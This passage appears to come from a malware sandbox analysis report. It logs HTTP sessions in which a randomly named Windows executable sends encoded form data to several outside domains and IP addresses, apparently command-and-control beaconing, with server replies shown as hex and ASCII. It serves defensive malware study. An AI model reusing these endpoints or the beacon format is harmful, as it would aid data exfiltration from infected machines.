                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            40192.168.2.650055173.236.199.97805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:17.994131088 CET548OUTGET /z5bv/?u6nP_F48=cvqi6aS93HIxTV+im7Da9wWvrF3f6kX831gUtjTv5ZY+kxOTwbTgT7fbXvvVwY5eJbST1YhYPLKkRqd0ELEj3LZc91hb0mGUNuPi7mwbOhhaZQnJVaKvflcbWzyST/JxwAq3b9E=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.kvsj.net
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:41:19.131710052 CET479INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:18 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 315
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            41192.168.2.65005685.159.66.93805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:25.386986017 CET812OUTPOST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 71 74 30 37 38 41 7a 37 49 72 38 39 39 72 6d 54 39 64 63 32 33 76 47 33 56 55 6e 78 6a 47 30 74 6a 64 49 47 34 77 79 31 63 6b 77 32 67 69 4a 73 62 75 64 76 4a 56 49 49 53 31 64 73 71 52 79 59 77 33 4d 35 51 65 6d 72 64 52 78 70 52 46 70 4f 30 62 31 57 6f 42 74 75 51 4f 69 55 4f 6e 4e 49 2f 79 79 35 38 31 39 45 51 36 33 4b 53 34 74 73 32 32 4e 31 4b 64 33 52 4d 45 63 46 57 42 36 66 4c 6f 33 43 65 47 79 67 38 75 56 53 33 31 56 34 75 42 59 39 45 6e 38 77 34 39 6a 51 33 79 46 33 68 45 53 42 32 4d 67 46 61 77 47 76 6e 78 6b 39 68 6e 59 30 6f 77 6c 7a 47 6f 61 55 52 57 2b 6a 5a 32 70 6b 4e 61 37 61 38 62 79 67
                                                                                                                            Data Ascii: u6nP_F48=qt078Az7Ir899rmT9dc23vG3VUnxjG0tjdIG4wy1ckw2giJsbudvJVIIS1dsqRyYw3M5QemrdRxpRFpO0b1WoBtuQOiUOnNI/yy5819EQ63KS4ts22N1Kd3RMEcFWB6fLo3CeGyg8uVS31V4uBY9En8w49jQ3yF3hESB2MgFawGvnxk9hnY0owlzGoaURW+jZ2pkNa7a8byg


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.65005785.159.66.93805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:28.051297903 CET836OUTPOST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 71 74 30 37 38 41 7a 37 49 72 38 39 39 4b 57 54 2f 38 63 32 6d 66 47 30 5a 30 6e 78 32 32 31 71 6a 61 41 47 34 78 6d 6c 63 57 6b 32 6a 48 31 73 4a 38 35 76 46 31 49 49 63 56 64 54 6b 78 79 48 77 33 42 45 51 66 61 72 64 52 6c 70 52 41 74 4f 31 6f 4e 56 71 52 74 73 66 75 69 53 41 48 4e 49 2f 79 79 35 38 31 35 69 51 36 76 4b 53 72 6c 73 73 53 35 79 4a 64 33 57 62 30 63 46 48 52 36 62 4c 6f 33 73 65 48 75 4b 38 73 74 53 33 77 70 34 75 56 30 2b 4f 6e 38 70 6e 74 6a 42 2f 44 39 38 68 43 58 6a 31 74 67 45 45 43 61 66 6d 48 35 6e 39 55 59 58 36 67 46 78 47 71 43 6d 52 32 2b 4a 62 32 52 6b 66 4e 33 39 7a 76 58 44 2f 38 67 56 67 53 7a 38 37 54 6e 78 56 31 47 4b 36 79 69 59 74 51 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=qt078Az7Ir899KWT/8c2mfG0Z0nx221qjaAG4xmlcWk2jH1sJ85vF1IIcVdTkxyHw3BEQfardRlpRAtO1oNVqRtsfuiSAHNI/yy5815iQ6vKSrlssS5yJd3Wb0cFHR6bLo3seHuK8stS3wp4uV0+On8pntjB/D98hCXj1tgEECafmH5n9UYX6gFxGqCmR2+Jb2RkfN39zvXD/8gVgSz87TnxV1GK6yiYtQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.2.65005885.159.66.93805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:30.717328072 CET1849OUTPOST /8l49/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.beythome.online
                                                                                                                            Referer: http://www.beythome.online/8l49/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 71 74 30 37 38 41 7a 37 49 72 38 39 39 4b 57 54 2f 38 63 32 6d 66 47 30 5a 30 6e 78 32 32 31 71 6a 61 41 47 34 78 6d 6c 63 57 38 32 6a 79 35 73 62 4e 35 76 45 31 49 49 55 31 64 6f 6b 78 79 4b 77 33 4a 41 51 66 58 51 64 55 68 70 51 6d 52 4f 38 35 4e 56 6a 52 74 73 61 65 69 58 4f 6e 4e 5a 2f 79 6a 77 38 31 70 69 51 36 76 4b 53 74 42 73 36 57 4e 79 45 39 33 52 4d 45 63 4a 57 42 37 47 4c 6f 66 61 65 48 37 2f 2f 63 4e 53 33 51 5a 34 73 6d 4d 2b 43 6e 38 72 6d 74 69 63 2f 43 41 6b 68 43 6a 46 31 74 55 71 45 43 75 66 6e 67 42 6b 74 6e 34 75 35 78 4a 33 65 36 61 53 4a 6a 32 43 56 46 35 67 4f 66 48 37 74 75 6e 4d 36 35 6f 66 6a 6a 4b 42 77 68 4c 48 65 69 65 66 38 52 4b 54 35 2b 4c 44 50 36 37 59 54 36 73 34 42 2b 45 37 71 31 66 62 6a 39 4d 43 69 31 33 46 47 48 47 6e 79 38 67 64 4d 6a 74 68 51 44 52 33 58 62 74 2f 59 70 6b 51 46 34 50 72 36 49 42 2f 63 69 66 37 43 2f 6d 52 62 38 53 47 75 34 2f 37 64 79 76 48 6f 72 69 34 50 4f 37 41 51 47 38 68 6b 50 77 7a 39 6e 71 70 2b 6e 68 68 35 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=qt078Az7Ir899KWT/8c2mfG0Z0nx221qjaAG4xmlcW82jy5sbN5vE1IIU1dokxyKw3JAQfXQdUhpQmRO85NVjRtsaeiXOnNZ/yjw81piQ6vKStBs6WNyE93RMEcJWB7GLofaeH7//cNS3QZ4smM+Cn8rmtic/CAkhCjF1tUqECufngBktn4u5xJ3e6aSJj2CVF5gOfH7tunM65ofjjKBwhLHeief8RKT5+LDP67YT6s4B+E7q1fbj9MCi13FGHGny8gdMjthQDR3Xbt/YpkQF4Pr6IB/cif7C/mRb8SGu4/7dyvHori4PO7AQG8hkPwz9nqp+nhh5zj8A5lzEhgKX8LDq4Bi2YLC9er5i3bXj8bJWj8z/9xbZK03GiKQ1s5pNjmYEgDzLe/ckO6L3meDBcygC9I//IEHvYtGklMjUBvdaBc2zBpjXY9Ai8zkPoZ6iVODe6BJxESK5PeW/lHZKNNID8BkO6MkL8z4bW4RTNdg4arkWS5+iTvPWU85+TsRDIltoYQj20TbCsCt+RUC4KQ2xJwPQvRl1HseALf+PNKrxrg9DL7YMQirtlwGuamZh/8zribI+RiueaxPUOIsi9apjz/vyclUF4oXhB5nIU+K3ndYTz7vynTtlOl590rfHQjah3GakyR/Mscu2nZHPpLX7ksyipzqxFr8RCvfmjxnuW7uycIMI7ZMAoX4i1l4t9WJscsd8MNWRurxC6beb+uBRYSO8bCBd+4whK817yDDz7DjcOH9egLyqk3wxD3ir+Iesla/KrAjkPrbcVfngRqKpdd4y/DGdsN7qxsKdqHfxXezA+SJDVUQQ3s10QgdY5gqNrfNok1aEnQodyBWQV6susPcbYaCsWFrGZ3wwD1GJ7+IVPnst6Iv/F3i5jfsuDsqO8fbpJ+VdE+VDu/YWLeQLeZu1Paw8qjnNLQon/YxlUVcHAK9q5KxwKHhxryl2YpWS6D8+fJS2BU33Has/I0zRL/FKWTgGDuhf4M5a2L [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.2.65005985.159.66.93805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:33.384145021 CET555OUTGET /8l49/?u6nP_F48=nvcb/0GPN54d2JGc++8p3dyReVT22F4rjpMi4BWXcGVVoAh+NvljRHAQbHtQixLLlmtkfcmDaBBvdXdVxLFdqzx8TquVI3FC1FmB8VJ2JKjVM5x76R9HEtDUYFAgHCOmYLPQQCg=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.beythome.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:41:34.704046011 CET225INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.14.1
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:34 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                            X-Rate-Limit-Reset: 2024-12-03T13:41:39.4849300Z


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.2.650060154.70.82.246805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:49.508117914 CET824OUTPOST /j7q9/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.conseilnsaftogo.org
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.conseilnsaftogo.org
                                                                                                                            Referer: http://www.conseilnsaftogo.org/j7q9/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4b 54 52 50 4f 30 58 76 70 5a 63 6c 6a 71 76 54 4d 4b 57 6b 48 57 36 48 2f 61 33 45 31 42 37 62 38 57 39 34 58 2f 4c 77 33 57 62 37 66 4c 2b 54 48 63 42 51 6c 77 56 67 66 76 6d 48 7a 6e 71 76 54 5a 70 37 4d 6a 55 2b 37 49 4d 43 33 6e 5a 4a 33 45 45 59 75 4f 36 53 74 61 38 6d 52 42 38 78 39 77 54 37 67 59 49 57 49 7a 72 63 75 73 53 69 4d 4f 49 67 30 52 69 4a 4d 65 38 38 49 6e 6d 68 4d 50 39 6e 4b 61 39 44 43 4e 62 48 5a 64 59 55 4c 4b 54 41 56 44 4b 59 31 68 48 73 4d 64 68 6b 4e 67 34 65 7a 62 4d 64 72 52 63 76 6b 46 51 70 6c 75 63 51 61 49 4c 41 43 39 6e 30 4e 44 44 71 43 79 57 5a 52 36 52 48 69 49 6c 46
                                                                                                                            Data Ascii: u6nP_F48=KTRPO0XvpZcljqvTMKWkHW6H/a3E1B7b8W94X/Lw3Wb7fL+THcBQlwVgfvmHznqvTZp7MjU+7IMC3nZJ3EEYuO6Sta8mRB8x9wT7gYIWIzrcusSiMOIg0RiJMe88InmhMP9nKa9DCNbHZdYULKTAVDKY1hHsMdhkNg4ezbMdrRcvkFQplucQaILAC9n0NDDqCyWZR6RHiIlF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            46192.168.2.650061154.70.82.24680
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:41:53.030522108 CET848OUTPOST /j7q9/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.conseilnsaftogo.org
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.conseilnsaftogo.org
                                                                                                                            Referer: http://www.conseilnsaftogo.org/j7q9/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 4b 54 52 50 4f 30 58 76 70 5a 63 6c 69 4a 33 54 4c 73 65 6b 47 32 36 45 77 36 33 45 37 68 36 53 38 57 78 34 58 36 36 37 33 6c 2f 37 66 75 61 54 56 4e 42 51 6d 77 56 67 58 50 6e 4e 39 48 72 6a 54 5a 6c 64 4d 68 77 2b 37 49 6f 43 33 69 6c 4a 32 31 45 66 2f 4f 36 51 69 36 38 65 4a 68 38 78 39 77 54 37 67 5a 6f 6f 49 7a 7a 63 75 63 69 69 50 76 49 6a 71 42 69 49 50 65 38 38 43 33 6d 6c 4d 50 39 4a 4b 66 6c 6c 43 50 54 48 5a 63 6f 55 4b 66 6e 44 66 44 4b 65 32 52 47 54 48 63 55 61 55 67 6b 5a 2f 62 49 37 30 68 59 72 68 7a 4e 7a 35 64 63 7a 49 59 72 43 43 2f 2f 47 4e 6a 44 41 41 79 75 5a 44 74 64 67 74 38 41 6d 6a 73 47 4c 2b 64 57 6b 77 53 72 74 50 67 66 66 6c 75 78 45 47 67 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=KTRPO0XvpZcliJ3TLsekG26Ew63E7h6S8Wx4X6673l/7fuaTVNBQmwVgXPnN9HrjTZldMhw+7IoC3ilJ21Ef/O6Qi68eJh8x9wT7gZooIzzcuciiPvIjqBiIPe88C3mlMP9JKfllCPTHZcoUKfnDfDKe2RGTHcUaUgkZ/bI70hYrhzNz5dczIYrCC//GNjDAAyuZDtdgt8AmjsGL+dWkwSrtPgffluxEGg==
                                                                                                                            Dec 3, 2024 14:41:55.487888098 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:55 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                            Link: <https://conseilnsaftogo.org/wp-json/>; rel="https://api.w.org/"
                                                                                                                            Data Raw: 33 66 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 73 65 69 6c 6e 73 61 66 74 6f 67 6f 2e 6f 72 67 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d [TRUNCATED]
                                                                                                                            Data Ascii: 3f0a<!DOCTYPE html><html lang="en-US"><head><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://conseilnsaftogo.org/xmlrpc.php"><meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.8 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - NSAF - TOGO</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - NSAF - TOGO" /><meta property="og:site_name" content="NSAF - TOGO" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://conseilnsaftogo.org/
                                                                                                                            Dec 3, 2024 14:41:55.487917900 CET1236INData Raw: 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 73 65 69 6c 6e 73 61 66 74 6f 67 6f 2e 6f 72 67 2f 22 2c 22 6e 61 6d 65 22 3a 22 4e 53 41 46 20 2d 20 54 4f 47 4f 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a
                                                                                                                            Data Ascii: #website","url":"https://conseilnsaftogo.org/","name":"NSAF - TOGO","description":"Conseil de dialogue Togo-France","publisher":{"@id":"https://conseilnsaftogo.org/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"E
                                                                                                                            Dec 3, 2024 14:41:55.487931013 CET1236INData Raw: 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61
                                                                                                                            Data Ascii: rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="NSAF - TOGO &raquo; Feed" href="https://conseilnsaftogo.org/feed/" /><link rel="alternate" type="application/rss+xml" title="NSAF - T
                                                                                                                            Dec 3, 2024 14:41:55.488054991 CET1236INData Raw: 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 32 36 61 37 5c 75 66 65 30 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 33 5c 75 66 65 30 66
                                                                                                                            Data Ascii: ){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb
                                                                                                                            Dec 3, 2024 14:41:55.488126040 CET896INData Raw: 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72
                                                                                                                            Data Ascii: tamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{v
                                                                                                                            Dec 3, 2024 14:41:55.488140106 CET1236INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61
                                                                                                                            Data Ascii: (function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */<
                                                                                                                            Dec 3, 2024 14:41:55.488152981 CET1236INData Raw: 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74
                                                                                                                            Data Ascii: + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3
